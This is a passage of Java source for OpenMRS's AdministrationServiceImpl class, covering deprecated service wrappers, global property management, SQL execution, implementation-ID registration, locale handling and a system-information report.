org.openmrs.api.db.AdministrationDAO; import org.openmrs.customdatatype.CustomDatatypeUtil; import org.openmrs.module.Module; import org.openmrs.module.ModuleFactory; import org.openmrs.module.ModuleUtil; import org.openmrs.reporting.AbstractReportObject; import org.openmrs.reporting.Report; import org.openmrs.util.HttpClient; import org.openmrs.util.LocaleUtility; import org.openmrs.util.OpenmrsConstants; import org.openmrs.util.OpenmrsUtil; import org.openmrs.util.PrivilegeConstants; import org.springframework.transaction.annotation.Transactional; import org.springframework.util.StringUtils; import org.springframework.validation.Errors; /** * Default implementation of the administration services. This class should not be used on its own. * The current OpenMRS implementation should be fetched from the Context * * @see org.openmrs.api.AdministrationService * @see org.openmrs.api.context.Context */ @Transactional public class AdministrationServiceImpl extends BaseOpenmrsService implements AdministrationService, GlobalPropertyListener { protected Log log = LogFactory.getLog(getClass()); protected AdministrationDAO dao; private EventListeners eventListeners; /** * An always up-to-date collection of the allowed locales. 
*/ private GlobalLocaleList globalLocaleList; private HttpClient implementationIdHttpClient; /** * Default empty constructor */ public AdministrationServiceImpl() { } /** * @see org.openmrs.api.AdministrationService#setAdministrationDAO(org.openmrs.api.db.AdministrationDAO) */ public void setAdministrationDAO(AdministrationDAO dao) { this.dao = dao; } public void setEventListeners(EventListeners eventListeners) { this.eventListeners = eventListeners; } /** * @see org.openmrs.api.AdministrationService#createEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void createEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().saveEncounterType(encounterType); } /** * @see org.openmrs.api.AdministrationService#updateEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void updateEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().saveEncounterType(encounterType); } /** * @see org.openmrs.api.AdministrationService#deleteEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void deleteEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().purgeEncounterType(encounterType); } /** * @see org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void createPatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().savePatientIdentifierType(patientIdentifierType); } /** * @see org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void updatePatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().savePatientIdentifierType(patientIdentifierType); } /** * @see org.openmrs.api.PatientService#purgePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#purgePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void deletePatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().purgePatientIdentifierType(patientIdentifierType); } /** * Create a new Tribe * * @param tribe Tribe to create * @throws APIException * @deprecated */ @Deprecated public void createTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Update Tribe * * @param tribe Tribe to update * @throws APIException * @deprecated */ @Deprecated public void updateTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Delete Tribe * * @param tribe Tribe to delete * @throws APIException * @deprecated */ @Deprecated public void deleteTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Retire Tribe * * @param tribe Tribe to retire * @throws APIException * @deprecated */ @Deprecated public void retireTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. 
Install the Tribe module"); } /** * Unretire Tribe * * @param tribe Tribe to unretire * @throws APIException * @deprecated */ @Deprecated public void unretireTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * @deprecated */ @Deprecated public void createFieldType(FieldType fieldType) throws APIException { Context.getFormService().saveFieldType(fieldType); } /** * @deprecated */ @Deprecated public void updateFieldType(FieldType fieldType) throws APIException { Context.getFormService().saveFieldType(fieldType); } /** * @deprecated */ @Deprecated public void deleteFieldType(FieldType fieldType) throws APIException { Context.getFormService().purgeFieldType(fieldType); } /** * @deprecated use {@link org.openmrs.api.ObsService#saveMimeType(MimeType)} */ @Deprecated public void createMimeType(MimeType mimeType) throws APIException { Context.getObsService().saveMimeType(mimeType); } /** * @deprecated use {@link org.openmrs.api.ObsService#saveMimeType(MimeType)} */ @Deprecated public void updateMimeType(MimeType mimeType) throws APIException { Context.getObsService().saveMimeType(mimeType); } /** * @deprecated use {@link org.openmrs.api.ObsService#purgeMimeType(MimeType)} */ @Deprecated public void deleteMimeType(MimeType mimeType) throws APIException { Context.getObsService().purgeMimeType(mimeType); } /** * @see org.openmrs.api.AdministrationService#createLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void createLocation(Location location) throws APIException { Context.getLocationService().saveLocation(location); } /** * @see org.openmrs.api.AdministrationService#updateLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void updateLocation(Location location) throws APIException { Context.getLocationService().saveLocation(location); } /** * @see org.openmrs.api.AdministrationService#deleteLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void deleteLocation(Location location) throws APIException { Context.getLocationService().purgeLocation(location); } /** * @see org.openmrs.api.AdministrationService#createRole(org.openmrs.Role) * @deprecated */ @Deprecated public void createRole(Role role) throws APIException { Context.getUserService().saveRole(role); } /** * @see org.openmrs.api.AdministrationService#updateRole(org.openmrs.Role) * @deprecated */ @Deprecated public void updateRole(Role role) throws APIException { Context.getUserService().saveRole(role); } /** * @see org.openmrs.api.AdministrationService#deleteRole(org.openmrs.Role) * @deprecated */ @Deprecated public void deleteRole(Role role) throws APIException { Context.getUserService().purgeRole(role); } /** * @see org.openmrs.api.AdministrationService#createPrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void createPrivilege(Privilege privilege) throws APIException { Context.getUserService().savePrivilege(privilege); } /** * @see org.openmrs.api.AdministrationService#updatePrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void updatePrivilege(Privilege privilege) throws APIException { Context.getUserService().savePrivilege(privilege); } /** * @see org.openmrs.api.AdministrationService#deletePrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void deletePrivilege(Privilege privilege) throws APIException { Context.getUserService().purgePrivilege(privilege); } /** * @deprecated moved to ConceptService */ @Deprecated public void 
createConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().saveConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().saveConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void deleteConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().purgeConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void createConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().saveConceptDatatype(cd); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().saveConceptDatatype(cd); } /** * @deprecated moved to ConceptService */ @Deprecated public void deleteConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().purgeConceptDatatype(cd); } /** * Create a new Report * * @param report Report to create * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void createReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_ADD_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_ADD_REPORTS); dao.createReport(report); } /** * Update Report * * @param report Report to update * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void updateReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_EDIT_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_EDIT_REPORTS); dao.updateReport(report); } /** * Delete Report * * @param report Report to delete * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void deleteReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_DELETE_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_DELETE_REPORTS); dao.deleteReport(report); } /** * Create a new Report Object * * @param reportObject Report Object to create * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void createReportObject(AbstractReportObject reportObject) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_ADD_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_ADD_REPORT_OBJECTS); dao.createReportObject(reportObject); } /** * Update Report Object * * @param reportObject Report Object to update * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void updateReportObject(AbstractReportObject reportObject) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_EDIT_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_EDIT_REPORT_OBJECTS); dao.updateReportObject(reportObject); } /** * Delete Report Object * * @param reportObjectId Internal Integer identifier of Report Object to delete * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void deleteReportObject(Integer reportObjectId) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_DELETE_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege 
required: " + OpenmrsConstants.PRIV_DELETE_REPORT_OBJECTS); dao.deleteReportObject(reportObjectId); } /** * @deprecated moved to ConceptServiceImpl */ @Deprecated public void updateConceptWord(Concept concept) throws APIException { Context.getConceptService().updateConceptWord(concept); } /** * @deprecated moved to ConceptServiceImpl */ @Deprecated public void updateConceptWords() throws APIException { Context.getConceptService().updateConceptWords(); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptWords(Integer conceptIdStart, Integer conceptIdEnd) throws APIException { Context.getConceptService().updateConceptWords(conceptIdStart, conceptIdEnd); } /** * @deprecated moved to ConceptService */ @Deprecated public void createConceptProposal(ConceptProposal cp) throws APIException { Context.getConceptService().saveConceptProposal(cp); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptProposal(ConceptProposal cp) throws APIException { Context.getConceptService().saveConceptProposal(cp); } /** * @deprecated moved to ConceptService */ @Deprecated public void mapConceptProposalToConcept(ConceptProposal cp, Concept mappedConcept) throws APIException { Context.getConceptService().mapConceptProposalToConcept(cp, mappedConcept); } /** * @deprecated moved to ConceptService * @see org.openmrs.api.AdministrationService#rejectConceptProposal(org.openmrs.ConceptProposal) */ @Deprecated public void rejectConceptProposal(ConceptProposal cp) { Context.getConceptService().rejectConceptProposal(cp); } /** * @see org.openmrs.api.AdministrationService#mrnGeneratorLog(java.lang.String, * java.lang.Integer, java.lang.Integer) * @deprecated */ @Deprecated public void mrnGeneratorLog(String site, Integer start, Integer count) throws APIException { if (!Context.hasPrivilege(PrivilegeConstants.EDIT_PATIENTS)) throw new APIAuthenticationException("Privilege required: " + PrivilegeConstants.EDIT_PATIENTS); dao.mrnGeneratorLog(site, start, count); } /** * @see org.openmrs.api.AdministrationService#getMRNGeneratorLog() * @deprecated */ @Deprecated @Transactional(readOnly = true) public Collection<?> getMRNGeneratorLog() throws APIException { if (!Context.hasPrivilege(PrivilegeConstants.EDIT_PATIENTS)) throw new APIAuthenticationException("Privilege required: " + PrivilegeConstants.EDIT_PATIENTS); return dao.getMRNGeneratorLog(); } /** * Static-ish variable used to cache the system variables. This is not static so that every time * a module is loaded or removed the variable is destroyed (along with the administration * service) and recreated the next time it is called */ protected SortedMap<String, String> systemVariables = null; /** * Set of locales which can be used to present messages in the user interface. Created lazily as * needed by {@link #getAllowedLocales()}. 
*/ private HashSet<Locale> presentationLocales; /** * @see org.openmrs.api.AdministrationService#getSystemVariables() */ @Transactional(readOnly = true) public SortedMap<String, String> getSystemVariables() throws APIException { if (systemVariables == null) { systemVariables = new TreeMap<String, String>(); // Added the server's fully qualified domain name try { systemVariables.put("OPENMRS_HOSTNAME", InetAddress.getLocalHost().getCanonicalHostName()); } catch (UnknownHostException e) { systemVariables.put("OPENMRS_HOSTNAME", "Unknown host: " + e.getMessage()); } systemVariables.put("OPENMRS_VERSION", String.valueOf(OpenmrsConstants.OPENMRS_VERSION)); systemVariables.put("DATABASE_NAME", OpenmrsConstants.DATABASE_NAME); systemVariables.put("DATABASE_BUSINESS_NAME", OpenmrsConstants.DATABASE_BUSINESS_NAME); systemVariables.put("OBSCURE_PATIENTS", String.valueOf(OpenmrsConstants.OBSCURE_PATIENTS)); systemVariables.put("OBSCURE_PATIENTS_FAMILY_NAME", OpenmrsConstants.OBSCURE_PATIENTS_FAMILY_NAME); systemVariables.put("OBSCURE_PATIENTS_GIVEN_NAME", OpenmrsConstants.OBSCURE_PATIENTS_GIVEN_NAME); systemVariables.put("OBSCURE_PATIENTS_MIDDLE_NAME", OpenmrsConstants.OBSCURE_PATIENTS_MIDDLE_NAME); systemVariables.put("MODULE_REPOSITORY_PATH", ModuleUtil.getModuleRepository().getAbsolutePath()); systemVariables.put("OPERATING_SYSTEM_KEY", String.valueOf(OpenmrsConstants.OPERATING_SYSTEM_KEY)); systemVariables.put("OPERATING_SYSTEM", String.valueOf(OpenmrsConstants.OPERATING_SYSTEM)); } return systemVariables; } /** * @see org.openmrs.api.AdministrationService#getGlobalProperty(java.lang.String) */ @Transactional(readOnly = true) public String getGlobalProperty(String propertyName) throws APIException { // This method should not have any authorization check if (propertyName == null) return null; return dao.getGlobalProperty(propertyName); } /** * @see org.openmrs.api.AdministrationService#getGlobalProperty(java.lang.String, * java.lang.String) */ @Transactional(readOnly = true) public String getGlobalProperty(String propertyName, String defaultValue) throws APIException { String s = getGlobalProperty(propertyName); if (s == null) return defaultValue; return s; } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyObject(java.lang.String) */ @Transactional(readOnly = true) public GlobalProperty getGlobalPropertyObject(String propertyName) { return dao.getGlobalPropertyObject(propertyName); } /** * @see org.openmrs.api.AdministrationService#getGlobalProperties() * @deprecated */ @Deprecated @Transactional(readOnly = true) public List<GlobalProperty> getGlobalProperties() throws APIException { return Context.getAdministrationService().getAllGlobalProperties(); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperties(java.util.List) * @deprecated */ @Deprecated public void setGlobalProperties(List<GlobalProperty> props) throws APIException { Context.getAdministrationService().saveGlobalProperties(props); } /** * @see org.openmrs.api.AdministrationService#deleteGlobalProperty(java.lang.String) * @deprecated */ @Deprecated public void deleteGlobalProperty(String propertyName) throws APIException { Context.getAdministrationService().purgeGlobalProperty(new GlobalProperty(propertyName)); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperty(java.lang.String, * java.lang.String) */ public void setGlobalProperty(String propertyName, String propertyValue) throws APIException { GlobalProperty gp = Context.getAdministrationService().getGlobalPropertyObject(propertyName); 
if (gp == null) { gp = new GlobalProperty(); gp.setProperty(propertyName); } gp.setPropertyValue(propertyValue); dao.saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#updateGlobalProperty(java.lang.String, * java.lang.String) */ public void updateGlobalProperty(String propertyName, String propertyValue) throws IllegalStateException { GlobalProperty gp = getGlobalPropertyObject(propertyName); if (gp == null) { throw new IllegalStateException("Global property with the given propertyName does not exist" + propertyName); } gp.setPropertyValue(propertyValue); dao.saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperty(org.openmrs.GlobalProperty) * @deprecated */ @Deprecated public void setGlobalProperty(GlobalProperty gp) throws APIException { Context.getAdministrationService().saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#addGlobalProperty(org.openmrs.GlobalProperty) * @deprecated */ @Deprecated public void addGlobalProperty(GlobalProperty gp) { setGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#addGlobalProperty(java.lang.String, * java.lang.String) * @deprecated */ @Deprecated public void addGlobalProperty(String propertyName, String propertyValue) throws APIException { //dao.addGlobalProperty(propertyName, propertyValue); Context.getAdministrationService().saveGlobalProperty(new GlobalProperty(propertyName, propertyValue)); } /** * @see org.openmrs.api.AdministrationService#getAllGlobalProperties() */ @Transactional(readOnly = true) public List<GlobalProperty> getAllGlobalProperties() throws APIException { return dao.getAllGlobalProperties(); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertiesByPrefix(java.lang.String) */ @Transactional(readOnly = true) public List<GlobalProperty> getGlobalPropertiesByPrefix(String prefix) { return dao.getGlobalPropertiesByPrefix(prefix); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertiesBySuffix(java.lang.String) */ @Transactional(readOnly = true) public List<GlobalProperty> getGlobalPropertiesBySuffix(String suffix) { return dao.getGlobalPropertiesBySuffix(suffix); } /** * @see org.openmrs.api.AdministrationService#purgeGlobalProperty(org.openmrs.GlobalProperty) */ public void purgeGlobalProperty(GlobalProperty globalProperty) throws APIException { notifyGlobalPropertyDelete(globalProperty.getProperty()); dao.deleteGlobalProperty(globalProperty); } /** * @see org.openmrs.api.AdministrationService#saveGlobalProperties(java.util.List) */ public List<GlobalProperty> saveGlobalProperties(List<GlobalProperty> props) throws APIException { log.debug("saving a list of global properties"); // add all of the new properties for (GlobalProperty prop : props) { if (prop.getProperty() != null && prop.getProperty().length() > 0) { Context.getAdministrationService().saveGlobalProperty(prop); } } return props; } /** * @see org.openmrs.api.AdministrationService#saveGlobalProperty(org.openmrs.GlobalProperty) */ public GlobalProperty saveGlobalProperty(GlobalProperty gp) throws APIException { // only try to save it if the global property has a key if (gp.getProperty() != null && gp.getProperty().length() > 0) { CustomDatatypeUtil.saveIfDirty(gp); dao.saveGlobalProperty(gp); notifyGlobalPropertyChange(gp); return gp; } return gp; } /** * @see org.openmrs.api.AdministrationService#executeSQL(java.lang.String, boolean) */ public List<List<Object>> executeSQL(String sql, boolean selectOnly) throws APIException { if (sql == null 
|| sql.trim().equals("")) return null; return dao.executeSQL(sql, selectOnly); } /** * @see org.openmrs.api.AdministrationService#addGlobalPropertyListener(GlobalPropertyListener) */ public void addGlobalPropertyListener(GlobalPropertyListener listener) { eventListeners.getGlobalPropertyListeners().add(listener); } /** * @see org.openmrs.api.AdministrationService#removeGlobalPropertyListener(GlobalPropertyListener) */ public void removeGlobalPropertyListener(GlobalPropertyListener listener) { eventListeners.getGlobalPropertyListeners().remove(listener); } /** * Calls global property listeners registered for this create/change * * @param gp */ private void notifyGlobalPropertyChange(GlobalProperty gp) { for (GlobalPropertyListener listener : eventListeners.getGlobalPropertyListeners()) if (listener.supportsPropertyName(gp.getProperty())) listener.globalPropertyChanged(gp); } /** * Calls global property listeners registered for this delete * * @param propertyName */ private void notifyGlobalPropertyDelete(String propertyName) { for (GlobalPropertyListener listener : eventListeners.getGlobalPropertyListeners()) if (listener.supportsPropertyName(propertyName)) listener.globalPropertyDeleted(propertyName); } /** * @see org.openmrs.api.AdministrationService#getImplementationId() */ @Transactional(readOnly = true) public ImplementationId getImplementationId() throws APIException { String property = Context.getAdministrationService().getGlobalProperty( OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID); // fail early if no gp has been defined yet if (property == null) return null; try { ImplementationId implId = OpenmrsUtil.getSerializer().read(ImplementationId.class, property); return implId; } catch (Throwable t) { log.debug("Error while getting implementation id", t); } return null; } /** * @see org.openmrs.api.AdministrationService#setImplementationId(org.openmrs.ImplementationId) */ public void setImplementationId(ImplementationId implementationId) throws APIException { if (implementationId == null) return; // check the validity of this implementation id with the server String description = implementationId.getDescription(); try { // check that source id is valid description = checkImplementationIdValidity(implementationId.getImplementationId(), description, implementationId.getPassphrase()); // save the server's description back to this concept source object implementationId.setDescription(description); boolean foundMatchingSource = false; // loop over the concept sources to make sure one exists for this hl7Code/implementationId List<ConceptSource> sources = Context.getConceptService().getAllConceptSources(); if (sources != null) { for (ConceptSource source : sources) { if (implementationId.getImplementationId().equals(source.getHl7Code())) { foundMatchingSource = true; } } } // if no ConceptSource currently exists with this implementationId, save this implId // as a new ConceptSource if (!foundMatchingSource) { ConceptSource newConceptSource = new ConceptSource(); newConceptSource.setName(implementationId.getName()); newConceptSource.setDescription(implementationId.getDescription()); newConceptSource.setHl7Code(implementationId.getImplementationId()); if (Context.getAuthenticatedUser() == null) // (hackish) newConceptSource.setCreator(new User(1)); // fake the user because no one is logged in Context.getConceptService().saveConceptSource(newConceptSource); } // serialize and save the ImplementationId to the global properties table StringWriter stringWriter = new StringWriter(); 
OpenmrsUtil.getSerializer().write(implementationId, stringWriter); Context.getAdministrationService().saveGlobalProperty( new GlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID, stringWriter.toString())); } catch (APIException e) { throw e; } catch (Exception e) { // pass any other exceptions on up the train throw new APIException(e); } finally { // save an empty concept source to the database when something fails? } } /** * Checks the remote server for this exact implementation id. Returns the description if 1) * there is no implementation id or 2) there is a implementation id and this passphrase matches * it. In the case of 1), this implementation id and passphrase are saved to the remote server's * database * * @param implementationId * @param description * @param passphrase * @return the stored description on the remote server * @throws APIException * @throws UnsupportedEncodingException */ private String checkImplementationIdValidity(String implementationId, String description, String passphrase) throws APIException { if (!StringUtils.hasLength(implementationId)) throw new APIException("The implementationid cannot be empty"); if (!StringUtils.hasLength(description)) throw new APIException("The description cannot be empty"); if (!StringUtils.hasLength(passphrase)) throw new APIException("The passphrase cannot be empty"); // set up the data map to post to the openmrs server Map<String, String> data = new HashMap<String, String>(); data.put("implementationId", implementationId); data.put("description", description); data.put("passphrase", passphrase); String response = implementationIdHttpClient.post(data); response = response.trim(); if ("".equals(response)) { String ms = Context.getMessageSourceService().getMessage("ImplementationId.connectionError", new String[] { implementationId }, Context.getLocale()); throw new APIException(ms); } if (log.isDebugEnabled()) log.debug("Response: " + response); if (response.startsWith("Success")) { response = response.replace("Success", ""); return response.trim(); } String ms = Context.getMessageSourceService().getMessage("ImplementationId.invalidIdorPassphrase", new String[] { description }, Context.getLocale()); throw new APIException(ms); } /** * @see org.openmrs.api.AdministrationService#getAllowedLocales() */ @Transactional(readOnly = true) public List<Locale> getAllowedLocales() { // lazy-load the global locale list and initialize with current global property value if (globalLocaleList == null) { globalLocaleList = new GlobalLocaleList(); Context.getAdministrationService().addGlobalPropertyListener(globalLocaleList); } Set<Locale> allowedLocales = globalLocaleList.getAllowedLocales(); // update the GlobalLocaleList.allowedLocales by faking a global property change if (allowedLocales == null) { // use a default language of "english" if they have cleared this GP for some reason String currentPropertyValue = getGlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST, LocaleUtility.getDefaultLocale().toString()); GlobalProperty allowedLocalesProperty = new GlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST, currentPropertyValue); globalLocaleList.globalPropertyChanged(allowedLocalesProperty); allowedLocales = globalLocaleList.getAllowedLocales(); } // allowedLocales is guaranteed to not be null at this point return new ArrayList<Locale>(allowedLocales); } /** * Used by spring to set the GlobalLocaleList on this implementation * * @param gll the GlobalLocaleList object that is registered to the 
GlobalPropertyListeners as * well */ public void setGlobalLocaleList(GlobalLocaleList gll) { globalLocaleList = gll; } /** * @see org.openmrs.api.AdministrationService#getPresentationLocales() */ @Transactional(readOnly = true) public Set<Locale> getPresentationLocales() { if (presentationLocales == null) { presentationLocales = new HashSet<Locale>(); Collection<Locale> messageLocales = Context.getMessageSourceService().getLocales(); List<Locale> allowedLocales = getAllowedLocales(); for (Locale possibleLocale : messageLocales) { if (allowedLocales.contains(possibleLocale)) { presentationLocales.add(possibleLocale); } else { // to be sure, check for language-only matches for (Locale allowedLocale : allowedLocales) { if (("".equals(allowedLocale.getCountry()) || "".equals(possibleLocale.getCountry())) && (allowedLocale.getLanguage().equals(possibleLocale.getLanguage()))) { presentationLocales.add(possibleLocale); break; } } } } } return presentationLocales; } /** * @see org.openmrs.api.GlobalPropertyListener#globalPropertyChanged(org.openmrs.GlobalProperty) */ public void globalPropertyChanged(GlobalProperty newValue) { if (newValue.getProperty().equals(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST)) { // reset the calculated locale values presentationLocales = null; } } /** * @see org.openmrs.api.GlobalPropertyListener#globalPropertyDeleted(java.lang.String) */ public void globalPropertyDeleted(String propertyName) { // TODO Auto-generated method stub } /** * @see org.openmrs.api.GlobalPropertyListener#supportsPropertyName(java.lang.String) */ public boolean supportsPropertyName(String propertyName) { return propertyName.equals(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyByUuid(java.lang.String) */ @Transactional(readOnly = true) public GlobalProperty getGlobalPropertyByUuid(String uuid) { return dao.getGlobalPropertyByUuid(uuid); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyValue(java.lang.String, * java.lang.Object) */ @SuppressWarnings("unchecked") public <T> T getGlobalPropertyValue(String propertyName, T defaultValue) throws APIException { if (defaultValue == null) throw new IllegalArgumentException("The defaultValue argument cannot be null"); String propVal = getGlobalProperty(propertyName); if (!StringUtils.hasLength(propVal)) return defaultValue; try { return (T) defaultValue.getClass().getDeclaredConstructor(String.class).newInstance(propVal); } catch (InstantiationException e) { throw new APIException(defaultValue.getClass().getName() + " is not able to be instantiated with value: " + propVal, e); } catch (NoSuchMethodException e) { throw new APIException(defaultValue.getClass().getName() + " does not have a string constructor", e); } catch (Exception e) { log.error("Unable to turn value '" + propVal + "' into type " + defaultValue.getClass().getName(), e); return defaultValue; } } /** * @see org.openmrs.api.AdministrationService#getSystemInformation() */ @Transactional(readOnly = true) public Map<String, Map<String, String>> getSystemInformation() throws APIException { Map<String, Map<String, String>> systemInfoMap = new LinkedHashMap<String, Map<String, String>>(); systemInfoMap.put("SystemInfo.title.openmrsInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; { put("SystemInfo.OpenMRSInstallation.systemDate", new SimpleDateFormat("yyyy-MM-dd").format(Calendar .getInstance().getTime())); 
put("SystemInfo.OpenMRSInstallation.systemTime", new SimpleDateFormat("HH:mm:ss").format(Calendar .getInstance().getTime())); put("SystemInfo.OpenMRSInstallation.openmrsVersion", OpenmrsConstants.OPENMRS_VERSION); try { put("SystemInfo.hostname", InetAddress.getLocalHost().getCanonicalHostName()); } catch (UnknownHostException e) { put("SystemInfo.hostname", "Unknown host: " + e.getMessage()); } } }); systemInfoMap.put("SystemInfo.title.javaRuntimeEnvironmentInformation", new LinkedHashMap<String, String>() { Properties properties = System.getProperties(); private static final long serialVersionUID = 1L; { put("SystemInfo.JavaRuntimeEnv.operatingSystem", properties.getProperty("os.name")); put("SystemInfo.JavaRuntimeEnv.operatingSystemArch", properties.getProperty("os.arch")); put("SystemInfo.JavaRuntimeEnv.operatingSystemVersion", properties.getProperty("os.version")); put("SystemInfo.JavaRuntimeEnv.javaVersion", properties.getProperty("java.version")); put("SystemInfo.JavaRuntimeEnv.javaVendor", properties.getProperty("java.vendor")); put("SystemInfo.JavaRuntimeEnv.jvmVersion", properties.getProperty("java.vm.version")); put("SystemInfo.JavaRuntimeEnv.jvmVendor", properties.getProperty("java.vm.vendor")); put("SystemInfo.JavaRuntimeEnv.javaRuntimeName", properties.getProperty("java.runtime.name")); put("SystemInfo.JavaRuntimeEnv.javaRuntimeVersion", properties.getProperty("java.runtime.version")); put("SystemInfo.JavaRuntimeEnv.userName", properties.getProperty("user.name")); put("SystemInfo.JavaRuntimeEnv.systemLanguage", properties.getProperty("user.language")); put("SystemInfo.JavaRuntimeEnv.systemTimezone", properties.getProperty("user.timezone")); put("SystemInfo.JavaRuntimeEnv.fileSystemEncoding", properties.getProperty("sun.jnu.encoding")); put("SystemInfo.JavaRuntimeEnv.userDirectory", properties.getProperty("user.dir")); put("SystemInfo.JavaRuntimeEnv.tempDirectory", properties.getProperty("java.io.tmpdir")); } }); systemInfoMap.put("SystemInfo.title.memoryInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; Runtime runtime = Runtime.getRuntime(); { put("SystemInfo.Memory.totalMemory", convertToMegaBytes(runtime.totalMemory())); put("SystemInfo.Memory.freeMemory", convertToMegaBytes(runtime.freeMemory())); put("SystemInfo.Memory.maximumHeapSize", convertToMegaBytes(runtime.maxMemory())); } }); systemInfoMap.put("SystemInfo.title.dataBaseInformation", new LinkedHashMap<String, String>() { Properties properties = Context.getRuntimeProperties(); private static final long serialVersionUID = 1L; { put("SystemInfo.Database.name", OpenmrsConstants.DATABASE_NAME); put("SystemInfo.Database.connectionURL", properties.getProperty("connection.url")); put("SystemInfo.Database.userName", properties.getProperty("connection.username")); put("SystemInfo.Database.driver", properties.getProperty("hibernate.connection.driver_class")); put("SystemInfo.Database.dialect", properties.getProperty("hibernate.dialect")); } }); systemInfoMap.put("SystemInfo.title.moduleInformation", new LinkedHashMap<String, String>() { private static final long serialVersionUID = 1L; { put("SystemInfo.Module.repositoryPath", ModuleUtil.getModuleRepository().getAbsolutePath()); Collection<Module> loadedModules = ModuleFactory.getLoadedModules(); for (Module module : loadedModules) { String moduleInfo = module.getVersion() + " " + (module.isStarted() ? 
